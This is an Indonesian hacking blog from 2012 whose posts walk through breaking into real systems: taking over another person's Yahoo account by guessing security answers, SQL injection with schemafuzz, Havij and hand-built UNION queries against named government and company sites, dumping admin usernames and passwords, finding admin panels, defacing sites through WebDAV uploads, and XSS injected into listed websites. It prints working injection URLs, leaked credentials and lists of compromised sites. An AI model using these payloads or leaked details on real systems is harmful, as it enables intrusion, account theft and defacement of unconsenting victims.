Sabtu, 14 Januari 2012

Membobol Akun Yahoo Dengan Metode Tebak-tebakan

Sebenarnya artikel ini didasarkan pada sebuah cerita nyata yang terjadi dikala saia sedang bener2 kepepet. Ceritanya ialah pada suatu hari laptop saia abis mengalami kerusakan & data2 saia yg ada dilaptop saia tersebut semuanya ludes ilang entah kemana, padahal didalamnya berisi Laporan Kerja Praktek, Foto2 Penting, Laporan KRCI yg akan dikirim ke Jakarta, dll. 

Nah, pada keesokan harinya, saia lupa kalo saia harus mengirimkan Laporan Kontes Robot ke Jakarta, suer waktu itu saia pusingnya setengah mampus (cuman setengah kok) & saia teringat bahwa sebelum laptop saia rusak, saia pernah mengirimkan laporan tersebut ke email salah satu tutor robot saia dalam bentuk word, tanpa basa-basi saia hubungi tuh tutor saia, tpi blas g ada jawaban & akhirnya muncullah niat jelek saia untuk membobol tuh email tutor saia, tpi gmna caranya saia g tau & akhirnya saia mencoba metode seperti yg akan kita laksanakan berikut ini.

Kita langsung ke TKP :

1 : Kita buka yahoo terlebih dahulu, lalu klik I can't access my account seperti terlihat digambar berikut :



2 : lalu klian pilih I forgot my password, lalu klik next seperti terlihat dibawah ini :



3 : Trus isikan nama email yg akan klian eksekusi & klo sudah, jgn lupa isi kode widget yg disediakan oleh Yahoo, trus klik next deh. Liat gambar dibawah yah :



4 : Lalu klian jawab deh pertanyaan kemanan yg sudah disediakan oleh yahoo dan dipilih oleh pengguna. Makanya saia bilang ini adalah metode tebak-tebakan..



5 : Apabila jawaban anda benar, maka anda akan dibawa kepertanyaan yg kedua seperti dibawah ini..



6 : Klo semua jawaban anda benar, maka anda akan dibawa kehalaman seperti dibawah ini :



7 : Taraaaaaam, kita berhasil. Tinggal kita isikan password baru sesuai kehendak kalian sendiri & secara otomatis, e-mail tersebut akan jadi milik kalian...

8 : Inget, gunakanlah cara ini sebaik mungkin, jgn dibuat untuk tujuan yg aneh. Gunakanlah klo anda bener2 kepepet saja seperti yg saia alami..

Minggu, 08 Januari 2012

SQL Injection Menggunakan Schemafuzz.py

Kali ini saia akan membahas tentang SQL Injection Menggunakan Schemafuzz. Sebelumnya kita sudah melakukan berbagai teknik SQL Injection, baik menggunakan cara manual ataupun menggunakan tools, tapi kali ini kita akan menggunakan sebuah script yg dibuat oleh darkcode dgn bahasa Python. Ok, saia tdk akan berbasa-basi ria lg, kita lngsng ke TKP yow :

Yg kita butuhkan adalah Program Python yg sudah terinstal dikompi/lepi anda serta Schemafuzz jga, silahkan kalian download dilink yg saia siapkan dibawah ini :

Python 27    => Link & kalian jga bisa mencarix di Google kok
Schemafuzz =>  Link & Scriptx

Klo sudah diinstal Pythonx, schemafuzz kalian masukkan kedalam folder Python di drive C..

Kalo sudah selesai, langsung kita jalankan. Caranya :
1 : Klik start >> Run >> CMD
2 : Trus kita masuk ke directory c:\ dengan mengetik CD ../.. <� mundur 2 dir
3 : masuk ke directory Python27 dengan cara ketik �cd Python27? hingga muncul C:\Python27>



4 : Jgn lupa untuk mencari targetx dulu & target yg saia ambil kali ini ialah :

http://www.ilpjitra.gov.my/newsdetails.asp?id=16


5 : Perintah dasar schemafuzzy ini yaitu :

schemafuzz.py -u �target� --perintah


6 : Pertama-tama, kita cek kolomnya dgn perintah 

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16 --findcol


Maka setelah anda menulis script diatas, akan muncul jumlah kolom seperti gambar dibawah ini :


Note : Klo script diatas tidak bisa jalan, maka tambahkanlah tanda (" ") sehingga menjadi :

schemafuzz.py -u "http://www.ilpjitra.gov.my/newsdetails.asp?id=16" --findcol


7 : Ok, sekarang kita lanjut untuk mencari DB, diatas terlihat panjang kolomx ada 10 dan pada tulisan darkcode, itulah celah yg akan kita susupi. Saia menggunakan perintah dibawah ini untuk mengekploitasinya..

schemafuzz.py -u  http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dbs

Hingga muncul hasil :


Nah kan, kita sudah temukan data base site tersebut, database ada 3 :
  1. lpx8
  2. mysql
  3. test
tapi pada penjesalan ini kita akan gunakan database nomor 1


8 : Cari nama table dalam database lpx8 menggunakan perintah :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --schema -D lpx8

Hingga Muncul Hasil :


Keluar semua kan kolomnya. Dari sini kita mengetahui bahwa web tersebut memiliki 14 Columns. Sekarang kita tinggal pilih kolom yang akan kita exploit & saia memilih kolom terakhir yaitu tbluser


9 : Sekarang waktunya kita Exploit Tables and Columns dgn perintah dibawah ini :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dump -D lpx8 -T diisi Nama table -C di isi nama columns

Misal saia mau melihat data-data yang ada di columns tbluser, kita menggunakan perintah :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dump -D lpx8 -T tbluser -C Username,Password

Hingga Muncul Hasil seperti di bawah ini :


Nah kan, coba lihat, keluar kan nama Username & Passwordnya :
lpadmin:shazam123 yg berarti username : lpadmin & Passwordx : shazam123, begitu juga seterusnya karena ada 3 user & pass yg berhasil kita jaring.. :)

10 : Nah user and password admin dah ketahuan, untuk login ke adminx, silahkan anda cari sendiri yah, diblog saia jga ada kok artikel yg menuliskan cara mencari letak kolom admin, 

11 : Cara ini hanya berlaku untuk sql versi 5. Untuk versi 4, Harus Manual.


Selamet mencoba & Sukseskan Dunia IT di Indonesia
Q-Whil3

Sabtu, 07 Januari 2012

XSS Again - Part II

Saia yakin klo semuanya udah tau apa itu XSS, tpi klo msih belum tau, kalian bisa membaca artikel saia tentang XSS yg sudah saia posting sebelumnya disini. Kenapa saia menulis artikel tentang XSS again, karena kebetulan saia menemukan dork XSS yg baru (bagi saia sih walaupun sebenarnya dork ini udah lama). Ok, kita langsung aj ke TKP yah...

Dork : inurl:framer.php?SUB=

1. Seperti biasa, kita cari lewat bantuan om Google...


Wao, banyak sekali web yg bisa kita eksekusi. 


2) Saia memilih salah satu website yaitu :

3) Lalu hapuslah script setelah tanda

4) Lalu anda ganti dgn script HTML seperti brikut ini : <font+color=red+size=8>Q-Whil3</font>

5 ) Hingga akhirnya menjadi seprti dibawah ini :

6) Dan apa yg terjadi ???

BERHASIL

Berikut ini website lainnya yg berhasil saia Inject :

Selamet ber XSS ria :)

Kamis, 05 Januari 2012

SQL Injection Menggunakan Tools => Havij 1.15 Vers.

Pastinya banyak sekali orang yang sudah mengerti tentang tools ini, jadi artikel ini hanya diperuntukkan bagi mereka yang belum mengerti tentang tools ini. So, yg udah ngerti siap2 kabur dari artikel ini yah, wkwkwkwk, kidding.. :)

Ok, kita langsung ke TKP yow�

1. Kita harus download dulu tools Havijnya. Sedot dimari bung => Sedoooot�

2. Klo udah didownload, langsung di Install yah�

3. Klo udah diinstal, langsung dibuka dibuka donk Havijnya� :)



4. Nah, sekarang kita cari targetnya, kalian bisa menggunakan dork2 yang sudah saya posting sebelumnya di blog ini, silakan mencari..

5. Target udah didapat, saia ambil contoh http://www.dephut.go.id/index.php?q=hotspot&hid=2054

6. Kita masukkan target tersebut kedalam kolom target (ikuti langkah 1), trus liat dilangkah 2, terlihat kan nama databasenya, trus klo udah berhasil, klik table yg sudah saia tandai dengan nomer 3..



7. klo sudah anda klik, maka tampilannya akan seperti dibawah ini, klo sudah, anda klik lagi Get Tables, liat nih gambar dibawah..



8. Wao, banyak sekali table2 yg terbuka. Trus ayo kita tebak dimana letak admin & passx berada, saia menebak klo user n passx ada di table web_users deh. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yg terletak disebelah Get Tables yg saia tandai dgn angka 2�



9. Selanjutnya, tinggal anda centang data yg ingin anda ambil (saia tandai dgn no 1), lalu klik get data, lalu kita liat apa yg terjadi�



10. Taraaaam, keliatan kan user sama passx, tapi terenkripsi dengan md5. Gampang, tools ini kan juga menyediakan enkripsi untuk md5, silakan dishare sendiri yah�



11. Yg terpenting, tinggal anda cari sendiri deh letak kolom adminx�

Oya, tools ini selain menyediakan decrypt untuk md5, jga menyediakan cara mencari letak kolom admin loh, tpi ntara saia posting di artikel selanjutnya� :) dadah..!!!

Rabu, 04 Januari 2012

Mencari Letak Kolom Admin Menggunakan Admin Finder

Ketika kita melakukan penetrasi sebuah website dan berhasil mendapatkan username serta password target sasaran kita, hal yg kadang2 menganjal ialah kita masih belum tahu letak kolom admin web target sasaran kita. Cara ini mungkin bisa sedikit membantu anda untuk mencari letak kolom admin tsb & cara ini jga bisa digunakan ketika anda lupa dimana letak kolom admin milik anda (buat orang2 yg pelupa seperti saia). Langsung saja ke TKP, cekidot :

Sebentar, sebelum ke TKP, klian harus mendownload dulu file dibawah ini :P
Pertama, Karena kita menggunakan bahasa Perl, maka anda harus menginstall Perl terlebih dahulu dilepy anda. Anda bisa mencarinya di google atau anda bisa download melalui link berikut ini => Link 1 & Link 2

Kedua, Download-lah file berikut ini => Admin Finder.pl

Atau boleh juga disini => Admin Finder.pl

Ok semua, Kalo sudah, ikuti cara penggunaanx berikut ini :

1. Install Perl terlebih dahulu
2. File admin.pl yg sudah anda download, taruhlah di drive C
3. Jalankan cmd dgn cara Start Run CMD
4. Anda akan dibawa kehalaman Command Prompt, lalu anda ketikkan cd\



5. Kemudian ketik: admin.pl lalu enter. Maka anda akan dibawa kehalaman seperti dibawah ini



6. Lalu kita masukkan alamat target. Contoh : www.uni****.ac.id 



7. Kita akan dihadapkan oleh pilihan bahasa, untuk itu kita cukup menulis any



8. Proses pencarian-pun akan dilakukan..



Dan Taraaaaam, keliatan kan letak kolom adminnya.. Selamat mencoba yaah & selalu sukseskan dunia IT di Indonesia�

Selasa, 03 Januari 2012

SQL Injection - Pengertian & Uji Coba

Artikel ini dibuat hanya untuk pembelajaran karena kita harus inget �No System Is Safe�. Kata2 itu juga berlaku untuk seluruh website yang ada didunia maya, termasuk blog saia juga sih. Beberapa hari ini saia dimintai tolong untuk melihat sebuah website milik komunitas (kebetulan saia adminx, wkwkwk..!!!!) dan yg terjadi adalah, banyaknya aktivitas2 yg tak dikenal yg berusaha menginject web tersebut dgn berbagai metode termasuk metode yg paling sering digunakan didunia ini untuk mendeface sebuah web, metode itu ialah yg akan kita bahas di artikel ini. Dan untuk itulah timbul pikiran saia untuk membuat artikel ini sebagai bahan pembelajaran dan sharing kepada teman2 smua�

Ok, langsung saja :

Apa sih Sql Injection itu..??? SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data (eng: database) di dalam sistem.

Kita langsung mencobanya..

Dork: inurl:news_details.php?id=

Sebagai contoh, kita mendapatkan target berikut :



Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda ( ) di akhir URL, contohnya sebagai berikut:



Dan terlihat ada tulisan Query Failed qry1..

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut. Kita akan mengetahuinya sampai ada informasi �Query Failed qry1�.

Lakukan pengecekan dengan menggunakan perintah �order by�.

Kita akan mencoba dari 1��..tak terhingga, jadi bisa saja 1,2,3,4,5,6,7,8,9,dst.

Kebetulah dalam target ini hanya terdapat 9 kolom dalam table yang ada di database,

Contohnya:



Langkah pengetesannya adalah :

http://www.pigeon.co.id/news_details.php?newsid=104 order by 1-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 2-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 3-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 4-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 5-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 6-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 7-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 8-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 9-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 10-- => Query Failed qry1


Hal tersebut membuktikan bahwa tidak ada kolom ke 10 dalam table tersebut, jadi cuman ada 9 kolom. Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 9, kita gunakan perintah �UNION SELECT number,of,columns--� untuk mengatahui kolom mana yang dapat di akses:

Langkah2nya :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,4,5,6,7,8,9--

Maka anda akan menemukan gambar berikut :



Muncul 3 dan 4 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya. Langkah selanjutnya, mencari informasi versi database.

SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja �@@version�, pada kolom dimana saja yang bisa dipakai.

Misalkan kolom �4? kita ganti dengan �@@version

Contoh :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,@@version,5,6,7,8,9--

Akan muncul versi database 5.0.22-log, ini berarti database bisa di inject



Mengetahui Database Name
Langsung ajah kita replace kolom yang tadi digunakan �3,4? dibagian mana saja, kita gunakan kolom �4?, kita ganti dengan code berikut �group_concat(schema_name)� , dan jangan lupa tambahkan �from information_schema.schemata--� sesudah kolom terakhir.

Contoh :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,group_concat(schema_name),5,6,7,8,9 from information_schema.schemata--



Mengatahui Database Yang Dipakai
Langsung ajah ganti �group_concat(schema_name)� dengan �concat(database())� seperti contoh berikut:

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,concat(database()),5,6,7,8,9 from information_schema.schemata--


OK, kita telah mengetahui database yang dipakai saat ini adalah �indocitra�.


Mengetahui Nama Tabel
Langsung aja ganti �group_concat(table_name)� dan tambahkan �from information_schema.tables where table_schema=database()--� setelah kolom terakhir.

Contoh :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()--



Mengatahui Nama Kolom
Untuk mengetahui nama kolom, kita gunakan 2 query berikut:

group_concat(column_name)

from information_schema.columns where table_schema=database()--

Contoh :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database()--


Terlihat ada usernama & pass, itu yg akan kita ambil�


Mengambil Informasi Yang Ada Di Dalam Kolom
Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database. Eksekusi perintah berikut:

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,group_concat(username,0x3a,pass),5,6,7,8,9 from indocitra.pigeon_admin--


Ok, saia jelaskan maksud script diatas

=> 0x3a adalah nama lain untuk ( : )

=> from indocitra.pigeon admin adalah hasil database yg kita dapatkan distep awal tadi


Dari informasi di atas kita mendapatkan data: �admin_pigeon:5<75nsirf,indocitra:wfnythsin

yg berarti :

username : admin_pigeon

pass : 5<75nsirf  (belum diketahui)

saia masih belum tau apa apakah pass tersebut dienkripsi atau tidak & klo emank dienkripsi, enkripsi apa yg digunakan..???  Mungkin ada yg bisa membantu saia..


Step terakhir ialah mencari letak kolom admin. Setelah saia mencari dengan metode yg Insya Allah saia posting klo ada kesempatan, ternyata kolom adminx terletak di :

http://www.pigeon.co.id/login.php



Ok semua, selamet berkreasi dan sukseskan dunia IT di Indonesia...

Senin, 02 Januari 2012

Mendeface Sebuah Website (Hanya bekerja di Win XP)

Cara ini sama sekali tidak merusak karena kita hanya mensisipkan file yg akan kita jadikan hasil defacean ke web target. Ok langsung saja, Shoot Your Target :

Dork : inurl:�~r00t.txt�

1 : Buka Run (Windws +R) lalu masukkan script ini kedalamnya

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}


Maka anda akan dibawa ke dalam file Web Folder.


2: Cari target Web yg akan anda deface dengan menggunakan dork yg sudah saia beri diatas. Saia mengambil target => www.hbsgjy.com

3: Klo sudah dapat targetx, kita lalu masuk kembali ke file Web Folder lalu klik kanan trus pilih New => Web Folder



4 : Lalu anda akan dibawa ke form seperti dibawah ini :


Isikan web yg akan anda jadikan target kedalam kolom (seperti yg terlihat diatas), lalu klik next. Apabila gagal anda, maka web tersebut tidak bisa dijadikan target dan kita harus mencari web target kita yg laen. Klo bisa/sukses maka kita akan dibawa ke form seperti dibawah ini :



Nah, ternyata kita sekses & tinggal kita klik Finish, lalu terbentuklah sebuah folder seperti gmbar dibawah ini :



5 : Klik 2 kli pada folder yg sudah saia beri tanda bulat dgn cara mengklik 2 kali. Lalu tinggal anda upload file yg ingin anda jadikan bahan deface. Contohnya saia mengupload file khiwil.html



6 : Klo sudah anda upload, untuk menjalankannya tinggal anda klik 2 kli pada file yg kalian upload & TARAAAAM�.



7 : Untuk melihat hasil defacean kalian klik nama web trus tambahkan nama uploadan kalain. Contoh :



Example :
  1. http://www.xyhuacheng.com/khiwil.html
  2. http://www.nssu.co.kr/khiwil.html

Selamat mencoba yah�

Minggu, 01 Januari 2012

XSS (Cross Site Scripting) - Pengertian & Uji Coba

Tadi ada salah satu teman yg bertanya tentang apa itu XSS dan bgaimana penggunaanx. Ok, mungkin saia bisa menjelaskan sedikit. Menurut salah satu web yg ada di Indonesia, XSS itu sendiri mempunyai pengertian suatu cara memasukkan code/script HTM kedalam suatu website dan dijalankan melalui browser di client. XSS merupakan pilihan para newbie (seperti saia) yg tidak mempunyai shell dan sploit, karena untuk melakukanx hanya dibutuhkan sebuah browser. Yg harus diinget adalah XSS hanya memasukan script kedalam URL site target.

Kita langsung uji coba :

Dork : inurl:/gen_confirm.php?errmsg=



Keliatan klo banyak sekali site yg bisa dibuat uji coba & pada kali ini saia mengambil salah satu site milik malaysia..



Coba anda liat address bar & coba anda hapus seluruh script dibelakang errmsg= lalu rubah menjadi <font+color=red+size=8>Q-Whil3</font>

Dan inilah yg terjadi :


Selamat mencoba, karena cara ini tidak berbahaya kok & dibawah ini saia berikan hasil2 web yg sudah saia coba ekploitasi dgn XSS. Let's check this :

  1. http://www.all-from.eu/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  2. http://www.b2b-now.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  3. http://www.naukrialert.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  4. http://www.chinarab.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  5. http://daviddesoza.chukki-wukki.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  6. http://www.bangladeshmarketplace.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  7. http://www.adsdito.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  8. http://www.xeost.com/gen_confirm.php?es_type=prod&id=271&errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  9. http://www.crownhr.co.uk/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E


Q-Whil3
No System Is Safe